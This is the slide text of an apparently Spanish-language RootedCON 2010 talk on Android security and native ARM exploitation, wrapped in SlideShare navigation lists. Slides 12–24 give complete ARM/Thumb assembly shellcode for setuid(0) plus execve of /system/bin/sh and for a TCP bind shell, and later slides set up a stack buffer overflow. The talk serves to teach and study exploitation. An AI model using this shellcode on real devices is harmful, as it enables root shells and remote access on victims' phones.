Abel Valero - VM + VFS = The Wooden Horse [rooted2018]Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
 
Practica RIP v1 escenario a
Practica RIP v1  escenario aPractica RIP v1  escenario a
Practica RIP v1 escenario a
 
Reporte practica 6
Reporte practica 6Reporte practica 6
Reporte practica 6
 

Más de RootedCON

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
RootedCON
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
RootedCON
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
RootedCON
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
RootedCON
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
RootedCON
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
RootedCON
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
RootedCON
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
RootedCON
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
RootedCON
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
RootedCON
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
RootedCON
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
RootedCON
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
RootedCON
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
RootedCON
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
RootedCON
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
RootedCON
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
RootedCON
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
RootedCON
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
RootedCON
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
RootedCON
 

Más de RootedCON (20)

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
 

Último

MATERIAL BASE D A T O S .docx
MATERIAL BASE    D A T O S              .docxMATERIAL BASE    D A T O S              .docx
MATERIAL BASE D A T O S .docx
CarlosAndresLoaizaRe
 
2 FIBRA OPTICA COMO MEDIO DE RED DE ACCESO.pptx
2 FIBRA OPTICA COMO MEDIO DE RED DE ACCESO.pptx2 FIBRA OPTICA COMO MEDIO DE RED DE ACCESO.pptx
2 FIBRA OPTICA COMO MEDIO DE RED DE ACCESO.pptx
bellomiguelangel68
 
Evolución, características, aplicación, ventajas y desventajas de las TIC
Evolución, características, aplicación, ventajas y desventajas de las TICEvolución, características, aplicación, ventajas y desventajas de las TIC
Evolución, características, aplicación, ventajas y desventajas de las TIC
Henry W. Zavala
 
bomba-koomey -Todo sobre sus istema y conexiones
bomba-koomey -Todo sobre sus istema y conexionesbomba-koomey -Todo sobre sus istema y conexiones
bomba-koomey -Todo sobre sus istema y conexiones
JessAdrinGonzlezCade
 
Transporte a través del tiempo en el perú.pdf
Transporte a través del tiempo en el perú.pdfTransporte a través del tiempo en el perú.pdf
Transporte a través del tiempo en el perú.pdf
milagrosAlbanPacherr
 
Catalogo-Voxtech- accesorios radios RF.pdf
Catalogo-Voxtech- accesorios radios RF.pdfCatalogo-Voxtech- accesorios radios RF.pdf
Catalogo-Voxtech- accesorios radios RF.pdf
walter729637
 
CAMARAS DE SEGURIDAD Y CIRCUITO CERRADO DE TELEVISION
CAMARAS DE SEGURIDAD Y CIRCUITO CERRADO DE TELEVISIONCAMARAS DE SEGURIDAD Y CIRCUITO CERRADO DE TELEVISION
CAMARAS DE SEGURIDAD Y CIRCUITO CERRADO DE TELEVISION
JairoDarioCalleGarci1
 
aplicaciones de sistema de informacion geografico
aplicaciones de sistema de informacion geograficoaplicaciones de sistema de informacion geografico
aplicaciones de sistema de informacion geografico
cyberquiximies
 
BIOSENSORES BASADOS EN NANOTECNOLOGÍA.pdf
BIOSENSORES BASADOS EN NANOTECNOLOGÍA.pdfBIOSENSORES BASADOS EN NANOTECNOLOGÍA.pdf
BIOSENSORES BASADOS EN NANOTECNOLOGÍA.pdf
sunwndniel
 
El uso de las TIC en la vida cotidiana.pptx
El uso de las TIC en la vida cotidiana.pptxEl uso de las TIC en la vida cotidiana.pptx
El uso de las TIC en la vida cotidiana.pptx
Katia Reyes
 
"El uso de las TIC en la vida cotidiana". SantanaMartinez_Alejandra
"El uso de las TIC en la vida cotidiana". SantanaMartinez_Alejandra"El uso de las TIC en la vida cotidiana". SantanaMartinez_Alejandra
"El uso de las TIC en la vida cotidiana". SantanaMartinez_Alejandra
241578066
 
Informe_mc_bombas_Warman_001-WEIR vulco.pdf
Informe_mc_bombas_Warman_001-WEIR vulco.pdfInforme_mc_bombas_Warman_001-WEIR vulco.pdf
Informe_mc_bombas_Warman_001-WEIR vulco.pdf
Rubén Cortes Zavala
 
FORMATO DE de Instrucción Clínica.pdf
FORMATO DE  de Instrucción Clínica.pdfFORMATO DE  de Instrucción Clínica.pdf
FORMATO DE de Instrucción Clínica.pdf
HenrySalinas17
 
Conceptos y definiciones de Antenas y propagación
Conceptos y definiciones de Antenas y propagaciónConceptos y definiciones de Antenas y propagación
Conceptos y definiciones de Antenas y propagación
edgarcalle8
 
11. Legislación Aplicada a la Informática.pdf
11. Legislación Aplicada a la Informática.pdf11. Legislación Aplicada a la Informática.pdf
11. Legislación Aplicada a la Informática.pdf
PanchoChangue
 
Diapositiva sobre Tecnologia de la Información y Telecomunicaciones.pptx
Diapositiva sobre Tecnologia de la Información y Telecomunicaciones.pptxDiapositiva sobre Tecnologia de la Información y Telecomunicaciones.pptx
Diapositiva sobre Tecnologia de la Información y Telecomunicaciones.pptx
GnesisOrtegaDeLen
 
DN Consultores | Una mirada al mercado de fibra en Perú
DN Consultores | Una mirada al mercado de fibra en PerúDN Consultores | Una mirada al mercado de fibra en Perú
DN Consultores | Una mirada al mercado de fibra en Perú
estudios22
 
PRESENTACION_TRANSFRENIA DE EMBRIONES _2019_MANAZO.pdf
PRESENTACION_TRANSFRENIA DE EMBRIONES _2019_MANAZO.pdfPRESENTACION_TRANSFRENIA DE EMBRIONES _2019_MANAZO.pdf
PRESENTACION_TRANSFRENIA DE EMBRIONES _2019_MANAZO.pdf
MARCOMARCAVILLACA1
 
_Manejo de Riesgos en el Laboratorio.pdf
_Manejo de Riesgos en el Laboratorio.pdf_Manejo de Riesgos en el Laboratorio.pdf
_Manejo de Riesgos en el Laboratorio.pdf
correodetareas
 
Informe de electroforesis del ADN MEDIANTE EL MinION Mk1C.pdf
Informe de electroforesis del ADN MEDIANTE EL MinION Mk1C.pdfInforme de electroforesis del ADN MEDIANTE EL MinION Mk1C.pdf
Informe de electroforesis del ADN MEDIANTE EL MinION Mk1C.pdf
KEVINYOICIAQUINOSORI
 

Último (20)

MATERIAL BASE D A T O S .docx
MATERIAL BASE    D A T O S              .docxMATERIAL BASE    D A T O S              .docx
MATERIAL BASE D A T O S .docx
 
2 FIBRA OPTICA COMO MEDIO DE RED DE ACCESO.pptx
2 FIBRA OPTICA COMO MEDIO DE RED DE ACCESO.pptx2 FIBRA OPTICA COMO MEDIO DE RED DE ACCESO.pptx
2 FIBRA OPTICA COMO MEDIO DE RED DE ACCESO.pptx
 
Evolución, características, aplicación, ventajas y desventajas de las TIC
Evolución, características, aplicación, ventajas y desventajas de las TICEvolución, características, aplicación, ventajas y desventajas de las TIC
Evolución, características, aplicación, ventajas y desventajas de las TIC
 
bomba-koomey -Todo sobre sus istema y conexiones
bomba-koomey -Todo sobre sus istema y conexionesbomba-koomey -Todo sobre sus istema y conexiones
bomba-koomey -Todo sobre sus istema y conexiones
 
Transporte a través del tiempo en el perú.pdf
Transporte a través del tiempo en el perú.pdfTransporte a través del tiempo en el perú.pdf
Transporte a través del tiempo en el perú.pdf
 
Catalogo-Voxtech- accesorios radios RF.pdf
Catalogo-Voxtech- accesorios radios RF.pdfCatalogo-Voxtech- accesorios radios RF.pdf
Catalogo-Voxtech- accesorios radios RF.pdf
 
CAMARAS DE SEGURIDAD Y CIRCUITO CERRADO DE TELEVISION
CAMARAS DE SEGURIDAD Y CIRCUITO CERRADO DE TELEVISIONCAMARAS DE SEGURIDAD Y CIRCUITO CERRADO DE TELEVISION
CAMARAS DE SEGURIDAD Y CIRCUITO CERRADO DE TELEVISION
 
aplicaciones de sistema de informacion geografico
aplicaciones de sistema de informacion geograficoaplicaciones de sistema de informacion geografico
aplicaciones de sistema de informacion geografico
 
BIOSENSORES BASADOS EN NANOTECNOLOGÍA.pdf
BIOSENSORES BASADOS EN NANOTECNOLOGÍA.pdfBIOSENSORES BASADOS EN NANOTECNOLOGÍA.pdf
BIOSENSORES BASADOS EN NANOTECNOLOGÍA.pdf
 
El uso de las TIC en la vida cotidiana.pptx
El uso de las TIC en la vida cotidiana.pptxEl uso de las TIC en la vida cotidiana.pptx
El uso de las TIC en la vida cotidiana.pptx
 
"El uso de las TIC en la vida cotidiana". SantanaMartinez_Alejandra
"El uso de las TIC en la vida cotidiana". SantanaMartinez_Alejandra"El uso de las TIC en la vida cotidiana". SantanaMartinez_Alejandra
"El uso de las TIC en la vida cotidiana". SantanaMartinez_Alejandra
 
Informe_mc_bombas_Warman_001-WEIR vulco.pdf
Informe_mc_bombas_Warman_001-WEIR vulco.pdfInforme_mc_bombas_Warman_001-WEIR vulco.pdf
Informe_mc_bombas_Warman_001-WEIR vulco.pdf
 
FORMATO DE de Instrucción Clínica.pdf
FORMATO DE  de Instrucción Clínica.pdfFORMATO DE  de Instrucción Clínica.pdf
FORMATO DE de Instrucción Clínica.pdf
 
Conceptos y definiciones de Antenas y propagación
Conceptos y definiciones de Antenas y propagaciónConceptos y definiciones de Antenas y propagación
Conceptos y definiciones de Antenas y propagación
 
11. Legislación Aplicada a la Informática.pdf
11. Legislación Aplicada a la Informática.pdf11. Legislación Aplicada a la Informática.pdf
11. Legislación Aplicada a la Informática.pdf
 
Diapositiva sobre Tecnologia de la Información y Telecomunicaciones.pptx
Diapositiva sobre Tecnologia de la Información y Telecomunicaciones.pptxDiapositiva sobre Tecnologia de la Información y Telecomunicaciones.pptx
Diapositiva sobre Tecnologia de la Información y Telecomunicaciones.pptx
 
DN Consultores | Una mirada al mercado de fibra en Perú
DN Consultores | Una mirada al mercado de fibra en PerúDN Consultores | Una mirada al mercado de fibra en Perú
DN Consultores | Una mirada al mercado de fibra en Perú
 
PRESENTACION_TRANSFRENIA DE EMBRIONES _2019_MANAZO.pdf
PRESENTACION_TRANSFRENIA DE EMBRIONES _2019_MANAZO.pdfPRESENTACION_TRANSFRENIA DE EMBRIONES _2019_MANAZO.pdf
PRESENTACION_TRANSFRENIA DE EMBRIONES _2019_MANAZO.pdf
 
_Manejo de Riesgos en el Laboratorio.pdf
_Manejo de Riesgos en el Laboratorio.pdf_Manejo de Riesgos en el Laboratorio.pdf
_Manejo de Riesgos en el Laboratorio.pdf
 
Informe de electroforesis del ADN MEDIANTE EL MinION Mk1C.pdf
Informe de electroforesis del ADN MEDIANTE EL MinION Mk1C.pdfInforme de electroforesis del ADN MEDIANTE EL MinION Mk1C.pdf
Informe de electroforesis del ADN MEDIANTE EL MinION Mk1C.pdf
 

Javier Moreno & Eloi Sanfélix - Seguridad y explotación nativa en Android [RootedCON 2010]

  • 1. Seguridad y explotación nativa en Android Smashing the droid for fun and profit Congreso de Seguridad ~ Rooted CON’2010 1
  • 2. Agenda • Introducción • Shellcoding • Buffer overflows • Kernel land • Post explotación Congreso de Seguridad ~ Rooted CON’2010 2
  • 3. Smart Phones • Definición difusa: – Terminal móvil – Sistema operativo complejo – Funciones avanzadas • Sistemas operativos: – Symbian, iPhoneOS, Blackberry, Android, PalmOS, Maemo Linux Congreso de Seguridad ~ Rooted CON’2010 3
  • 4. ¿Por qué son interesantes? • Cada vez son más similares a un ordenador • Robo de datos personales • Suplantación de identidades • Conexión permanente 3G • Sistemas con poco tiempo en el mercado • Baja frecuencia de actualización Congreso de Seguridad ~ Rooted CON’2010 4
  • 5. Introducción a Android • OS para smart phones y dispositivos móviles • Basado en Linux para ARM • Android SDK basado en Java – Máquina virtual Dalvik – Soporte JNI para código nativo – Muchas librerías nativas (webkit, rendering, …) Congreso de Seguridad ~ Rooted CON’2010 5
  • 6. Arquitectura de Android Congreso de Seguridad ~ Rooted CON’2010 6
  • 7. Modelo de seguridad • Sandboxing basado en permisos Unix – UID distinto por app – Permisos en el sistema de ficheros • Apps instaladas desde Android Marketplace – Auto firmadas por el autor • ¿ Java = plataforma segura? – Librerías nativas, kernel, etc Congreso de Seguridad ~ Rooted CON’2010 7
  • 8. Agenda • Introducción • Shellcoding • Buffer overflows • Kernel land • Post explotación Congreso de Seguridad ~ Rooted CON’2010 8
  • 9. Introducción a ARM • Copa el mercado de los dispositivos móviles • Relación consumo / prestaciones • Arquitectura licenciable (ARM IP) • Juego instrucciones RISC 32 bits, Bi-endian – Posibilidades de extensión Congreso de Seguridad ~ Rooted CON’2010 9
  • 10. ARM vs Thumb mode • Desde la versión ARM7TDMI • Thumb: versión reducida de la CPU a 16 bits • Mappeado con las instrucciones de 32 bits • Mejora la densidad de código • Menor consumo de memoria • Alineamiento – Modo ARM: 4 bytes – Modo Thumb: 2 bytes Congreso de Seguridad ~ Rooted CON’2010 10
  • 11. Peculiaridades de Thumb • Registros de propósito general de r0 a r7 • Menos instrucciones disponibles • Mnemónicos push/pop • Inmediato más grande posible = 255 • Limitaciones en el uso de registros desplazados • { r13, r14, r15, r16 } = { sp, lr, pc, cpsr } Congreso de Seguridad ~ Rooted CON’2010 11
  • 12. ARM ↔ Thumb • Bit T del CPSR a 1 indica modo Thumb • Branch Exchange (bx addr) – T = <LSB addr> – Compilar usando –mthumb-interwork .globl main main: .CODE 32 add r2,pc,#1 bx r2 .CODE 16 thumb: Congreso de Seguridad ~ Rooted CON’2010 12
  • 13. ARM ABI • Llamadas a funciones con bl – Dirección retorno en lr – Función llamada debe preservarlo • Muchas posibilidades para return – mov pc,lr / ldm sp,{pc}/… • Parámetros en r0,r1,… Congreso de Seguridad ~ Rooted CON’2010 13
  • 14. Syscalls en Linux/ARM • Definidas en el kernel – /usr/src/linux/arch/arm/include/asm/unistd.h • En general coinciden con x86 • Syscalls extra para socket – En lugar de socketcall Congreso de Seguridad ~ Rooted CON’2010 14
  • 15. Llamadas a syscalls • Parámetros en r0, r1, r2, ... • Número de la llamada en r7 • Saltamos al kernel con svc • Valor de retorno en r0 int open(const char *camino, int flags, mode_t modo); r0 r7 r0 r1 r2 Congreso de Seguridad ~ Rooted CON’2010 15
  • 16. Uso de sockets @ -- socket(2,1,0) -- @ parameters eor r5, r5 push {r5} En otras arquitecturas: add r5, r5, #1 push {r5} - Funciones en “net.h” add r5, r5, #1 push {r5} - r0 = función @ sys_call mov r0, #1 - r1 = parámetros mov r1, sp mov r7, #102 - Llamada Socketcall svc 0x00000080 mov r4, r0 Congreso de Seguridad ~ Rooted CON’2010 16
  • 17. Uso de sockets @ -- socket(2,1,0) -- @ parameters eor r5, r5 push {r5} @ -- socket(2,1,0) - add r5, r5, #1 - push {r5} mov r0, #2 add r5, r5, #1 mov r1, #1 push {r5} eor r2, r2 @ sys_call mov r7, #250 mov r0, #1 add r7, #31 @ 281 mov r1, sp svc 0x00000080 mov r7, #102 mov r4, r0 svc 0x00000080 mov r4, r0 Congreso de Seguridad ~ Rooted CON’2010 17
  • 18. Compatibilidad con iPhone OS • También utiliza ARM – El número syscall puede variar – Se debe poner en r12 • Shellcodes multiplataforma! • Número syscalls en: http://theiphonewiki.com/wiki/index.php?title=Kernel_Syscalls Congreso de Seguridad ~ Rooted CON’2010 18
  • 19. Shellcode execve (I) .globl main main: .CODE 32 add r2,pc,#1 bx r2 .CODE 16 thumb: @setuid(0) eor r0,r0 movs r7, #23 svc 0x00000080 @Prepare execve args adr r0, string adr r5, string2 eor r6, r6 str r6, [r5] Congreso de Seguridad ~ Rooted CON’2010 19
  • 20. Shellcode execve (II) push {r6} push {r0} mov r1, sp eor r2, r2, r2 @call execve() movs r7, #11 svc 0x00000080 .align 2 string: .ascii "///system/bin/sh" string2: .ascii "xAAxAAxAAxAA" Congreso de Seguridad ~ Rooted CON’2010 20
  • 21. TCP Bind shellcode (I) @ socket() mov r0, #2 mov r1, #1 eor r2, r2 mov r7, #250 add r7, #31 svc 0x00000080 mov r4, r0 @ preparing sockaddr_in eor r5, r5 push {r5} push {r5} push {r5} mov r5, #7 lsl r5, #8 add r5, #7 Congreso de Seguridad ~ Rooted CON’2010 21
  • 22. TCP Bind shellcode (II) lsl r5, #16 add r5, #2 push {r5} @bind() mov r0, r4 mov r1, sp mov r2, #16 mov r7, #250 add r7, #32 svc 0x00000080 @listen() mov r0, r4 mov r1, #1 mov r7, #250 add r7, #34 svc 0x00000080 Congreso de Seguridad ~ Rooted CON’2010 22
  • 23. TCP Bind shellcode (III) @accept() mov r0, r4 eor r1, r1 eor r2, r2 mov r7, #250 add r7, #35 svc 0x00000080 mov r6,r0 @dup2 stdin mov r0, r6 eor r1, r1 mov r7, #63 svc 0x00000080 Congreso de Seguridad ~ Rooted CON’2010 23
  • 24. TCP Bind shellcode (IV) @dup2 stdout mov r0, r6 mov r1, #1 mov r7, #63 svc 0x00000080 @dup2 stderr mov r0, r6 mov r1, #2 mov r7, #63 svc 0x00000080 @Execve shellcode appended here Congreso de Seguridad ~ Rooted CON’2010 24
  • 25. Módulos para Metasploit • Nuevas shellcodes para Android – execve(/system/bin/sh) – TCP Bind shellcode • Encoder XOR para ARM LE • Scripts de los ejemplos posteriores Congreso de Seguridad ~ Rooted CON’2010 25
  • 26. Agenda • Introducción • Shellcoding • Buffer overflows • Kernel land • Post explotación Congreso de Seguridad ~ Rooted CON’2010 26
  • 27. Mapa de memoria # cat /proc/self/maps 00008000-00019000 r-xp 00000000 1f:00 348 /system/bin/... 00019000-0001a000 rw-p 00011000 1f:00 348 /system/bin/... 0001a000-00020000 rwxp 0001a000 00:00 0 [heap] [...] afe00000-afe39000 r-xp 00000000 1f:00 478 /system/lib/... afe39000-afe3c000 rw-p 00039000 1f:00 478 /system/lib/... afe3c000-afe47000 rw-p afe3c000 00:00 0 b0000000-b0013000 r-xp 00000000 1f:00 332 /system/bin/... b0013000-b0014000 rw-p 00013000 1f:00 332 /system/bin/... b0014000-b001a000 rwxp b0014000 00:00 0 beebe000-beed3000 rwxp befeb000 00:00 0 [stack] <-- ASLR # Congreso de Seguridad ~ Rooted CON’2010 27
  • 28. Mapa de memoria - Implicaciones • Direcciones en la pila no predecibles – Difícil saltar directamente a buffers ahí • Pila y Heap mapeadas como rwx – Ejecución de código posible ☺ • Librerías en direcciones predecibles – Posibilidad de ejecutar su código – Paso de parámetros plantea problemas Congreso de Seguridad ~ Rooted CON’2010 28
  • 29. Buffer overflows - Stack • Programa de ejemplo: – Bucle esperando conexiones – Para cada conexión: • Leer entero de 32 bits X • Leer X bytes en un buffer de tamaño fijo – Compilado con la toolchain de Android • Ver http://source.android.com Congreso de Seguridad ~ Rooted CON’2010 29
